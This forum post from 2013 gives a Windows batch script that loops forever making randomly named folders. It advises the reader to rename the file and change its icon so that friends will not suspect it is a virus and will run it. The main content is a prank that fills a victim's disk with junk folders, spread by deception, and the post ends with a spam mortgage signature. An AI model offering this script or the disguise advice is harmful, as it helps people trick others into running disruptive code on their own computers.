PR Episodes Forum Index PR Episodes
Best Episodes ever
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 




How to create more than 3,000 folders under a minute

 
Post new topic   Reply to topic    PR Episodes Forum Index -> Welcome to ForumsLand.com - Free forum hosting service
View previous topic :: View next topic  
Author Message
Lyttonw0



Joined: 09 Jun 2013
Posts: 5

PostPosted: Sun Jun 09, 2013 3:51 am    Post subject: How to create more than 3,000 folders under a minute Reply with quote

1) Open your notepad and type
the following code.
@echo off
:top
md %random%
goto top
2) Save it as 1000.bat
@echo off makes your screen
appear blank but it is actually
making hundreds of folders.
md %random% is command that
creating folders with random
names.( md is a command to
make directory in ms-dos)
goto top – return the command
to :top, causes an infinite loop.
NOTE: The folders will get created
in the directory where you saved
the ”1000.bat” file.
The file might look suspicious to
your friends. So if you are
looking to fool your friends, then
change the file name and also
the icon so that he doesn’t
suspect the file to be a virus.
_________________
las vegas mortgage company
Back to top
View user's profile Send private message
Free Forum






PostPosted:      Post subject: ForumsLand.com

Back to top
Display posts from previous:   
Post new topic   Reply to topic    PR Episodes Forum Index -> Welcome to ForumsLand.com - Free forum hosting service All times are GMT
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Forum hosted by ForumsLand.com - 100% free forum. Powered by phpBB 2.